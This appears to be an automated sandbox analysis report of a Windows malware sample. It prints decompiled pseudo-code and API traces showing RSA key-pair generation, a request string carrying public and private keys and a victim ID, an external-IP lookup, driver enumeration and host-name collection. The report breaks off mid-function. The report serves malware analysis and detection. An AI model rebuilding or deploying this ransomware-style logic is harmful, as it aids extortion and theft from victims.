Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FE658D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FE65980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FE65999
lstrlenA.KERNEL32(00000000), ref: 0FE659A2
lstrlenA.KERNEL32(?), ref: 0FE659AA
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0FE659BB
lstrlenA.KERNEL32(?), ref: 0FE659D5
lstrlenA.KERNEL32(00000000), ref: 0FE659FE
lstrlenA.KERNEL32(?), ref: 0FE65A1E

Strings

&subid=, xrefs: 0FE65AE4
&priv_key=, xrefs: 0FE65B54
action=call&, xrefs: 0FE65A88
&id=, xrefs: 0FE65AD0
&pub_key=, xrefs: 0FE65B1D
&version=2.3.1r, xrefs: 0FE65B7F
popkadurak, xrefs: 0FE65BFE, 0FE65C1A

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: 1e52b67cbe239ccb72c4ac16bd6c7ea42fe33d0f12c21726d20afbad3c8f6f00
Instruction ID: 5f0cb875b26b68df13319d06917fceeaf976afdcb5301ace188e7f23b226c2bd
Opcode Fuzzy Hash: 1e52b67cbe239ccb72c4ac16bd6c7ea42fe33d0f12c21726d20afbad3c8f6f00
Instruction Fuzzy Hash: 7CF10D71648309AFD710CF25CC84B6BBBA9FF89B94F04092DF584A3290DB74E905CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0FE647D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0FE62D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0FE648C0(); // executed
					E0FE642B0(_t90, _t106); // executed
					E0FE66550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0FE66500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0FE64B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0FE65860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0FE664C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0FE64200();
							InitializeCriticalSection(0xfe72a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0FE63FF0( &_v80);
							} else {
								E0FE641D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xfe72a48);
							__eflags = E0FE63C70();
							if(__eflags != 0) {
								E0FE645B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0FE63DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xfe72a44;
							if( *0xfe72a44 != 0) {
								_t97 =  *0xfe72a44; // 0x27a0000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0FE63DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

0x0fe64b2b
0x0fe64b31
0x0fe64b38
0x0fe64b51
0x0fe64b57
0x0fe64b5e
0x0fe64b74
0x0fe64b78
0x0fe64b7c
0x0fe64b7c
0x0fe64b82
0x0fe64b86
0x0fe64b86
0x0fe64b8c
0x0fe64b91
0x0fe64b99
0x0fe64b9e
0x0fe64ba5
0x0fe64bac
0x0fe64bb3
0x0fe64bcd
0x0fe64bd2
0x0fe64bd9
0x0fe64bea
0x0fe64c3b
0x0fe64c53
0x0fe64c58
0x0fe64c5d
0x0fe64c6c
0x0fe64c5f
0x0fe64c64
0x0fe64c64
0x0fe64c73
0x0fe64c78
0x0fe64c7d
0x0fe64c84
0x0fe64c8b
0x0fe64c92
0x0fe64c99
0x0fe64c9d
0x0fe64cef
0x0fe64cef
0x0fe64cf9
0x0fe64cff
0x0fe64d03
0x0fe64d15
0x0fe64d05
0x0fe64d0b
0x0fe64d0b
0x0fe64d1f
0x0fe64d2a
0x0fe64d2c
0x0fe64d2e
0x0fe64d2e
0x0fe64d47
0x0fe64d4a
0x0fe64d4e
0x0fe64d5b
0x0fe64d64
0x0fe64d74
0x0fe64d74
0x0fe64d7a
0x0fe64d81
0x0fe64d89
0x0fe64d97
0x0fe64d97
0x0fe64d9f
0x0fe64d9f
0x0fe64ca9
0x0fe64cbf
0x0fe64cd6
0x0fe64cdc
0x0fe64cde
0x0fe64ce8
0x00000000
0x0fe64ce8
0x0fe64ce2
0x0fe64bec
0x0fe64c00
0x0fe64c03
0x0fe64c07
0x0fe64c14
0x0fe64c1d
0x0fe64c2d
0x0fe64c2d
0x0fe64c35
0x0fe64c35
0x0fe64bea
0x0fe64b3c

APIs

Sleep.KERNEL32(000003E8), ref: 0FE64B2B

Part of subcall function 0FE647D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6482C
Part of subcall function 0FE647D0: lstrcpyW.KERNEL32 ref: 0FE6484F
Part of subcall function 0FE647D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64856
Part of subcall function 0FE647D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6486E
Part of subcall function 0FE647D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6487A
Part of subcall function 0FE647D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64881
Part of subcall function 0FE647D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6489B

ExitProcess.KERNEL32 ref: 0FE64B3C
CreateThread.KERNEL32 ref: 0FE64B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FE64B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0FE64B7C
CloseHandle.KERNEL32(00000000), ref: 0FE64B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FE64BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FE64C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE64C2D
ExitProcess.KERNEL32 ref: 0FE64C35

Strings

open, xrefs: 0FE64D90

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: 962630d2b709f7c4cbadeaf70699339b5dd5247ccbb6359a0efd7ec38c5df628
Instruction ID: 1e82e0f1a1db91fcd2cf5aefa72332b720f604fe79738d0ddc0f58708c3adcdf
Opcode Fuzzy Hash: 962630d2b709f7c4cbadeaf70699339b5dd5247ccbb6359a0efd7ec38c5df628
Instruction Fuzzy Hash: A4712170E8030CABEB14DFE1DC59FEE7B75AB05B96F105015E601BA2C1DBB86944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0FE682B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0FE682B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x0fe682c0
0x0fe682c2
0x0fe682c7
0x0fe682ca
0x0fe682cd
0x0fe682d5
0x0fe683c9
0x0fe683d1
0x0fe682db
0x0fe682db
0x0fe682e0
0x0fe682e0
0x0fe682e3
0x0fe682e8
0x0fe682e9
0x0fe682f5
0x0fe682f5
0x0fe682fb
0x0fe68301
0x0fe68305
0x0fe683d7
0x0fe683e5
0x0fe683f3
0x0fe68313
0x0fe68316
0x0fe6831e
0x0fe68325
0x0fe6832c
0x0fe68332
0x0fe68336
0x0fe6833d
0x0fe68344
0x0fe6834b
0x0fe6834f
0x0fe68357
0x0fe68367
0x0fe68367
0x0fe6836c
0x0fe68374
0x00000000
0x0fe68376
0x0fe68376
0x0fe68377
0x0fe68378
0x0fe6837f
0x00000000
0x0fe68381
0x0fe68381
0x0fe68385
0x0fe68387
0x0fe6838a
0x0fe68391
0x0fe68395
0x0fe6839e
0x0fe683a2
0x0fe683a3
0x0fe68391
0x0fe683a7
0x0fe683a7
0x0fe6837f
0x0fe68359
0x0fe68359
0x0fe6835d
0x0fe68365
0x0fe683ae
0x0fe683ae
0x00000000
0x00000000
0x00000000
0x0fe68365
0x0fe683b5
0x0fe683c3
0x00000000
0x0fe683c3
0x0fe68305

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE682CD
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FE682FB
GetModuleHandleA.KERNEL32(?), ref: 0FE6834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE6835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE6836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE683C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE683E5

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0FE68367, 0FE6836A
Advapi32.dll, xrefs: 0FE68359, 0FE6835C

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: aeb629836da770ade52472ff733264591b5f55d0be2a972f847363c4dcdc845e
Instruction ID: 8211be7ff20d0244680cc93a6a5fa79c4c01d2d79d7c729c74c53b9d193f6770
Opcode Fuzzy Hash: aeb629836da770ade52472ff733264591b5f55d0be2a972f847363c4dcdc845e
Instruction Fuzzy Hash: B231F370A4020DABDB108FE5DC49BEFBB79FF05785F144029E901A6240EB74AA11CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0FE663E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0FE663E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0fe663f4
0x0fe663f8
0x0fe66400
0x0fe66438
0x0fe66446
0x0fe6644a
0x0fe66452
0x0fe66452
0x0fe66455
0x0fe6646e
0x0fe66486
0x0fe66490
0x0fe6649c
0x0fe664b1
0x00000000
0x0fe664b7
0x0fe66402
0x0fe6640d
0x00000000
0x0fe66431
0x0fe6641e
0x0fe66426
0x00000000
0x0fe6642f
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FE64B96,?,0FE64B9E), ref: 0FE663F8
GetLastError.KERNEL32(?,0FE64B9E), ref: 0FE66402
CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE64B9E), ref: 0FE6641E
CryptGenKey.ADVAPI32(0FE64B9E,0000A400,08000001,?,?,0FE64B9E), ref: 0FE6644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FE6646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FE66486
CryptDestroyKey.ADVAPI32(?), ref: 0FE66490
CryptReleaseContext.ADVAPI32(0FE64B9E,00000000), ref: 0FE6649C
CryptAcquireContextW.ADVAPI32(0FE64B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FE664B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FE663ED, 0FE66413, 0FE664A6

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: b6699d73ad44dc5e52c8ac452255c6ce57a431b82ac49034d444291db659c4f3
Instruction ID: 9ebf349fbfb273d4bbb029c8e6cab79e5e808daa84d67b8359dc6136c9b56130
Opcode Fuzzy Hash: b6699d73ad44dc5e52c8ac452255c6ce57a431b82ac49034d444291db659c4f3
Instruction Fuzzy Hash: 43219D74B9030DBBEB20CAE1DC4AFDB372AAB48B85F104414F601FA0C0D6B9A9109B61

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0FE62F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0fe62f5a
0x0fe62f69
0x0fe62f6d
0x0fe62f74
0x0fe62f76
0x0fe62f7b
0x0fe62f8d
0x0fe62f93
0x0fe62f97
0x0fe62fa8
0x0fe62fac
0x0fe62ff2
0x0fe62ffa
0x0fe63008
0x0fe62fae
0x0fe62fb1
0x0fe62fb3
0x0fe62fb8
0x0fe62fc0
0x0fe62fc5
0x0fe62fcf
0x0fe62fd7
0x00000000
0x0fe62fd9
0x0fe62fe3
0x0fe62feb
0x0fe63011
0x0fe63022
0x00000000
0x00000000
0x00000000
0x0fe62feb
0x00000000
0x0fe62fed
0x0fe62fed
0x0fe62fee
0x0fe62fc0
0x00000000
0x0fe62fb8
0x0fe62f99
0x0fe62f9e
0x0fe62f9e
0x0fe62f81
0x0fe62f81
0x0fe62f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FE62F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FE62F8D

Strings

iqt, xrefs: 0FE62FE3

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: iqt
API String ID: 4140748134-2805759263
Opcode ID: b3039c7fc5b20004d0e054c35b079b1222fe9a3fb6c9b2280910de691902374f
Instruction ID: b30e1f2fcbc006f9c529a997b23d17b065fdf4fa2ff841de3ce22fc2e4cc23fd
Opcode Fuzzy Hash: b3039c7fc5b20004d0e054c35b079b1222fe9a3fb6c9b2280910de691902374f
Instruction Fuzzy Hash: C621DA72A4021DBBEB109E999C41FEA77BCEB44755F0001B7FE04F6180DB75A9159B90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0FE67E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FE68024
Part of subcall function 0FE67E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FE6803D

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,747166A0,?), ref: 0FE6700F
lstrlenW.KERNEL32(0FE6FF8C), ref: 0FE6701C

Part of subcall function 0FE68050: InternetCloseHandle.WININET(?), ref: 0FE68063
Part of subcall function 0FE68050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FE68082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FE6FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FE6704B
wsprintfW.USER32 ref: 0FE67063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FE6FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FE67079
InternetCloseHandle.WININET(?), ref: 0FE67087

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0FE6703C
GET, xrefs: 0FE67024

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 8b8a470fe4c75918370911483bf36ee21e317b9b2fb7581fc0ff95fec3977c9c
Instruction ID: 927acce673895746b8d9839a93cb2c5effdae17ad5fd0ffc8ca6b48ba7e4f20b
Opcode Fuzzy Hash: 8b8a470fe4c75918370911483bf36ee21e317b9b2fb7581fc0ff95fec3977c9c
Instruction Fuzzy Hash: 35019635A8020C7BD6206A66AD4DF9B3E29AB82FA1F001035F904E1081DE685515C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67490 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0FE67490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
